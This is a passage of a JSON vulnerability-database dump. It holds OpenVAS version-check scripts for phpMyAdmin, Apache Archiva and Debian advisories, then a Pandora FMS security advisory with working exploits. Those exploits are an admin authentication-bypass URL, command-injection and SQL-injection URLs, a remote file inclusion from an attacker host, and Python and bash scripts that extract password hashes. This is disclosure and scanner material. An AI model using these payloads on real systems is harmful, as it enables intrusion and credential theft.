Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/051942.html\");\n script_id(862716);\n script_version(\"$Revision: 8243 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 07:30:04 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-23 07:38:58 +0100 (Thu, 23 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2010-18343\");\n script_cve_id(\"CVE-2010-4329\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2010-18343\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.3.8.1~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:40", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2011-01-24T00:00:00", "type": "openvas", "title": "FreeBSD Ports: phpMyAdmin", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2017-02-25T00:00:00", "id": "OPENVAS:68698", "href": "http://plugins.openvas.org/nasl.php?oid=68698", "sourceData": "#\n#VID 753f8185-5ba9-42a4-be02-3f55ee580093\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 753f8185-5ba9-42a4-be02-3f55ee580093\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n phpMyAdmin\n phpMyAdmin211\n\nCVE-2010-4329\nCross-site scripting (XSS) vulnerability in the PMA_linkOrButton\nfunction in libraries/common.lib.php in the database (db) search\nscript in phpMyAdmin 2.11.x before 2.11.11.1 and 3.x before 3.3.8.1\nallows remote attackers to inject arbitrary web script or HTML via a\ncrafted request.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-8.php\nhttp://www.vuxml.org/freebsd/753f8185-5ba9-42a4-be02-3f55ee580093.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(68698);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-24 17:55:59 +0100 (Mon, 24 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2010-4329\");\n script_name(\"FreeBSD Ports: phpMyAdmin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"phpMyAdmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.3.8.1\")<0) {\n txt += 'Package phpMyAdmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"phpMyAdmin211\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.11.11.1\")<0) {\n txt += 'Package phpMyAdmin211 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3449", "CVE-2010-4408"], "description": "Apache Archiva is prone to a cross-site request-forgery vulnerability.\n\nExploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized\naccess to the affected application. Other attacks are also possible.\n\nThe following versions are affected:\n\nArchiva versions 1.0 through 1.0.3\n\nArchiva versions 1.1 through 1.1.4\n\nArchiva versions 1.2 through 1.2.2\n\nArchiva versions 1.3 through 1.3.1", "modified": "2019-03-01T00:00:00", "published": "2010-12-01T00:00:00", "id": "OPENVAS:1361412562310100924", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100924", "type": "openvas", "title": "Apache Archiva Cross Site Request Forgery Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archiva_45095.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# Apache Archiva Cross Site Request Forgery Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:archiva\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100924\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-01 13:10:27 +0100 (Wed, 01 Dec 2010)\");\n script_bugtraq_id(45095);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2010-3449\", \"CVE-2010-4408\");\n\n script_name(\"Apache Archiva Cross Site Request Forgery Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/45095\");\n script_xref(name:\"URL\", value:\"http://archiva.apache.org/download.html\");\n script_xref(name:\"URL\", value:\"http://jira.codehaus.org/browse/MRM-1438\");\n script_xref(name:\"URL\", value:\"http://archiva.apache.org/docs/1.3.2/release-notes.html\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\");\n script_mandatory_keys(\"apache_archiva/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"solution\", value:\"Updates are available. Please see the reference for more details.\");\n script_tag(name:\"summary\", value:\"Apache Archiva is prone to a cross-site request-forgery vulnerability.\n\nExploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized\naccess to the affected application. Other attacks are also possible.\n\nThe following versions are affected:\n\nArchiva versions 1.0 through 1.0.3\n\nArchiva versions 1.1 through 1.1.4\n\nArchiva versions 1.2 through 1.2.2\n\nArchiva versions 1.3 through 1.3.1\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: vers, test_version: \"1\", test_version2:\"1.0.3\") ||\n version_in_range(version: vers, test_version: \"1.1\", test_version2:\"1.1.4\") ||\n version_in_range(version: vers, test_version: \"1.2\", test_version2:\"1.2.2\") ||\n version_in_range(version: vers, test_version: \"1.3\", test_version2:\"1.3.1\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:30", "description": "The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2139-1.", "cvss3": {}, "published": "2011-03-07T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2139-1 (phpmyadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4480", "CVE-2010-4329", "CVE-2010-4481"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231068980", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068980", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2139_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2139-1 (phpmyadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68980\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 16:04:02 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2010-4329\", \"CVE-2010-4480\", \"CVE-2010-4481\");\n script_name(\"Debian Security Advisory DSA 2139-1 (phpmyadmin)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB5\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202139-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2010-4329\n\nCross site scripting was possible in search, that allowed\na remote attacker to inject arbitrary web script or HTML.\n\nCVE-2010-4480\n\nCross site scripting was possible in errors, that allowed\na remote attacker to inject arbitrary web script or HTML.\n\nCVE-2010-4481\n\nDisplay of PHP's phpinfo() function was available to world, but only\nif this functionality had been enabled (defaults to off). This may\nleak some information about the host system.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.11.8.1-5+lenny7.\n\nFor the testing (squeeze) and unstable distribution (sid), these problems\nhave been fixed in version 3.3.7-3.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your phpmyadmin package.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2139-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"phpmyadmin\", ver:\"2.11.8.1-5+lenny7\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:55:50", "description": "The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2139-1.", "cvss3": {}, "published": "2011-03-07T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2139-1 (phpmyadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4480", "CVE-2010-4329", "CVE-2010-4481"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:68980", "href": "http://plugins.openvas.org/nasl.php?oid=68980", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2139_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2139-1 (phpmyadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2010-4329\n\nCross site scripting was possible in search, that allowed\na remote attacker to inject arbitrary web script or HTML.\n\nCVE-2010-4480\n\nCross site scripting was possible in errors, that allowed\na remote attacker to inject arbitrary web script or HTML.\n\nCVE-2010-4481\n\nDisplay of PHP's phpinfo() function was available to world, but only\nif this functionality had been enabled (defaults to off). This may\nleak some information about the host system.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.11.8.1-5+lenny7.\n\nFor the testing (squeeze) and unstable distribution (sid), these problems\nhave been fixed in version 3.3.7-3.\n\nWe recommend that you upgrade your phpmyadmin package.\";\ntag_summary = \"The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2139-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202139-1\";\n\n\nif(description)\n{\n script_id(68980);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 16:04:02 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2010-4329\", \"CVE-2010-4480\", \"CVE-2010-4481\");\n script_name(\"Debian Security Advisory DSA 2139-1 (phpmyadmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"phpmyadmin\", ver:\"2.11.8.1-5+lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:47", "description": "", "cvss3": {}, "published": "2010-12-01T00:00:00", "type": "packetstorm", "title": "Pandora FMS Command Injection / SQL Injection / Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-4283", "CVE-2010-4281", "CVE-2010-4280", "CVE-2010-4282", "CVE-2010-4278", "CVE-2010-4279"], "modified": "2010-12-01T00:00:00", "id": "PACKETSTORM:96259", "href": "https://packetstormsecurity.com/files/96259/Pandora-FMS-Command-Injection-SQL-Injection-Path-Traversal.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nPandora FMS Authentication Bypass and Multiple Input Validation \nVulnerabilities \n \nCVE IDs in this security advisory: \n \n1) Authentication bypass - CVE-2010-4279 \n2) OS Command Injection - CVE-2010-4278 \n3) SQL Injection - CVE-2010-4280 \n4) Blind SQL Injection - CVE-2010-4280 \n5) Path Traversal - CVE-2010-4281 - CVE-2010-4282 - CVE-2010-4283 \n \n \n[+] Introduction \n \nPandora FMS (for Pandora Flexible Monitoring System) is a software \nsolution for monitoring computer networks. It allows monitoring in a \nvisual way the status and performance of several parameters from \ndifferent operating systems, servers, applications and hardware systems \nsuch as firewalls, proxies, databases, web servers or routers. \n \nIt can be deployed in almost any operating system. It features remote \nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use \nagents. An agent is available for each platform. It can also monitor \nhardware systems with a TCP/IP stack, such as load balancers, routers, \nnetwork switches, printers or firewalls. \n \nThis software has several servers that process and get information from \ndifferent sources, using WMI for gathering remote Windows information, a \npredictive server, a plug-in server which makes complex user-defined \nnetwork tests, an advanced export server to replicate data between \ndifferent sites of Pandora FMS, a network discovery server, and an SNMP \nTrap console. \n \nReleased under the terms of the GNU General Public License, Pandora FMS \nis free software. \n \n \n[+] Description and Proof of Concept \n \n \n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10 \n \nAn attacker could access to any account user, including admin, using the \n\"hash login\" authentication process. This kind of authentication method \nworks providing a username and a hash. The issue could be exploited \nremotely providing a username and the md5 of it when \n$config['loginhash_pwd'] is empty, that in fact is the default \nconfiguration. \n \nSnippet of vulnerable code in index.php: \n \n136 // Hash login process \n137 if (! isset ($config['id_user']) && isset ($_GET[\"loginhash\"])) { \n138 $loginhash_data = get_parameter(\"loginhash_data\", \"\"); \n139 $loginhash_user = get_parameter(\"loginhash_user\", \"\"); \n140 \n141 if ($loginhash_data == \nmd5($loginhash_user.$config[\"loginhash_pwd\"])) { \n142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']); \n143 $_SESSION['id_usuario'] = $loginhash_user; \n144 $config[\"id_user\"] = $loginhash_user; \n \n \n \nProof of concept: \n \nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1 \n \nGot it! admin! :) \n \nBy default, any installation of this software allows unauthenticated \nattackers to perform an authentication bypass and a privilege escalation \nto admin. \n \n \n1.1) Additionally, a manual modification in order to use the hash_hmac \nfunction instead of the weak statement md5 ( $string . $KEY) is \nencouraged for security purposes. \n \nSnippet of code (index.php, version 3.1.1): \n \n145 // Hash login process \n(...) \n150 if ($config[\"loginhash_pwd\"] != \"\" && $loginhash_data == \nmd5($loginhash_user.$config[\"loginhash_pwd\"])) { \n \nIn line 150, use \nhash_hmac(\"sha256\",$loginhash_user,$config[\"loginhash_pwd\"]), instead of \nmd5($lioginhash_user.$config[\"loginhash_pwd\"]) \n \n \n2) OS Command Injection - CVE-2010-4278 - CVSS 9/10 \n \nThe layout parameter in file operation/agentes/networkmap.php is not \nproperly filtered and allows an attacker to inject OS commands. \n \nSnippet of vulnerable code (file operation/agentes/networkmap.php): \n \n32 $layout = (string) get_parameter ('layout', 'radial'); \n... \n137 $filename_map = $config[\"attachment_store\"].\"/networkmap_\".$layout; \n138 $filename_img = \"attachment/networkmap_\".$layout.\"_\".$font_size; \n139 $filename_dot = $config[\"attachment_store\"].\"/networkmap_\".$layout; \n... \n162 $cmd = \"$filter -Tcmapx -o\".$filename_map.\" -Tpng \n- -o\".$filename_img.\" \".$filename_dot; \n163 $result = system ($cmd); \n \nPoC: \n \nhttp://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a; \nhttp://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id; \n \nIf we use vulnerability #1 (that permits bypass the authentication \nsystem and login as admin) with this issue, the CVSS will be 10/10. \n \n \n3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10 \n \nThe parameter id_group when get_agents_group_json is equal to 1 is \nvulnerable to SQL Injection attacks. \n \nPoC: \nhttp://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario \n \n \nExploit: \n \n# Pandora Flexible Monitoring System SQL Injection PoC \n# Juan Galiana Lara \n# Gets the list of users and password from the database \n# \n#configure cookie&host before use it \n#usage \n#python sqlinj_users.py \n#admin:75b756ff2785ea8bb9ae02c13b6a71f1 \n#... \n \nimport json \nimport urllib2 \n \nheaders = {\"Cookie\": \"PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o\"} \n \nurl = \"http://HOST/pandora_console/ajax.php\" \nurl+= \n\"?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1\" \nurl+= \n\"/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario\" \n \nreq = urllib2.Request(url,headers=headers) \nresp = urllib2.urlopen(req) \n \nusers = json.read(resp.read()) \nfor user in users: \nprint(user[\"id_agente\"]+\":\"+user[\"nombre\"]) \n \n \nThe fix to these kind of issues was the implementation of a generic \nfilter against sql injection. A proper fix is planned for a major version. \n \n \n4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10 \n \nThe parameter group_id of operation/agentes/estado_agente.php is \nvulnerable to blind sql injection. \n \n \nPoC: \nhttp://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281 \n \n \nExploit: \n \n#!/bin/bash \n# Pandora Flexible Monitoring System Blind SQL Injection PoC \n# Juan Galiana Lara \n# Gets the md5 hash password from a specific user \n# \n#configure host,cookie&group_id before use it \n#usage \n#$ ./getpassword.sh \n#74b444ff2785ea8bb9ae02c13b6a71f1 \n \nHOST=\"HOST\" \nTARGET_USER=\"0x61646d696e\" #admin \nPATTERN=\"Interval\" \nCOOKIE=\"rq842tci6e5ib7t918c6sv1ml4\" \nCHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v \nw x y z) \nGROUP_ID=2 \n \nj=1 \nwhile [[ $j -lt 33 ]]; do \ni=0 \nwhile [[ $i -lt ${#CHARSET[@]} ]]; do \nc=$(printf '%d' \"'${CHARSET[$i]}\") \n \nURL=\"http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281\"; \ncurl $URL --cookie \"PHPSESSID=$COOKIE\" 2> /dev/null | grep -q \n$PATTERN; \nif [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi; \nlet i++ \ndone; \nif [[ $i -eq ${#CHARSET[@]} ]]; then echo \"Something went wrong!\"; \nexit 1; fi \nlet j++; \ndone \necho \nexit 0 \n \n \nThe fix to these kind of issues was the implementation of a generic \nfilter against sql injection. A proper fix is planned for a major version. \n \n \n5) Path Traversal: \n \n5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) - \nCVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10 \n \nParameter 'page' of ajax.php is not properly sanitizing user-supplied \ninput. The function safe_url_extraclean is filtering ':' character, and \nit doesn't allow to use the string \"http://\" to create urls, but allows \n'/' character and an attacker could reference remote resources via \nWindows UNC files, using //servername//resource/file \n \nNote that the first check in safe_url_extraclean is filtering '://', so \nwe can bypass the filter easily doing http://http://url, and it only \nstrip the first protocol://. However, the last preg_replace strips the : \ncharacter. \n \nProof of concept: \n \nUNC: http://servername/pandora_console/ajax.php?page=//server/share/test \n \nAs well, ajax.php allows to include any php file in the disk \n \nfilesystem: \nhttp://servername/pandora_console/ajax.php?page=../../../../../directory/file \n \nCharacter %00 is not allowed due safe_url_extraclean function filtering, \nand is not possible to include other files distinct that php files, but \nstill allows . and / characters. \n \n \n5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283 \n- - CVSS 7.9/10 \n \nAn attacker can inject arbitrary PHP code and execute it remotely due \nargv[1] parameter is not filtered in file pandora_diag.php. \n \nPoC: \nhttp://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php%00 \n \nNote: that issue needs register_globals set to On to be exploitable. \n \n \n5.3 - Path traversal & Local file inclusion vulnerabilities - \nCVE-2010-4282 - CVSS 6.8/10 \n \nAn attacker can include arbitrary files of the filesystem via id \nparameter in file pandora_help.php. \n \n \nSnippet of vulnerable code: \n \n24 $id = get_parameter ('id'); \n25 \n26 /* Possible file locations */ \n27 $files = array \n($config[\"homedir\"].\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\", \n28 \n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\", \n29 \n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/en/help_\".$id.\".php\", \n30 $config[\"homedir\"].\"/include/help/en/help_\".$id.\".php\"); \n31 $help_file = ''; \n32 foreach ($files as $file) { \n33 if (file_exists ($file)) { \n34 $help_file = $file; \n35 break; \n36 } \n37 } \n... \n62 require_once ($help_file); \n \n \nProof of concept: \n \nhttp://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini%00 \n \nThis code is platform dependent bug, you can read more at \nhttp://seclists.org/fulldisclosure/2010/Jul/137 \nOnly works in windows systems, an attacker can include local file using \n../ characters due parameter id is not filtered \nIf magic_quotes_gpc is Off, arbitrary files can be included, like \nboot.ini using NULL character (%00), if not, only php files are allowed \n \n \n5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282 \n- - CVSS 8.0/10 \n \nIn file operation/agentes/networkmap.php the 'layout' parameter is \nhandled in an insecure way and it is used to write and delete files on \nthe filesystem. \nAn attacker could use this parameter to write in arbitrary paths and \neven remove files. \n \nSnippet of vulnerable code: \n \n32 $layout = (string) get_parameter ('layout', 'radial'); \n... \n137 $filename_map = 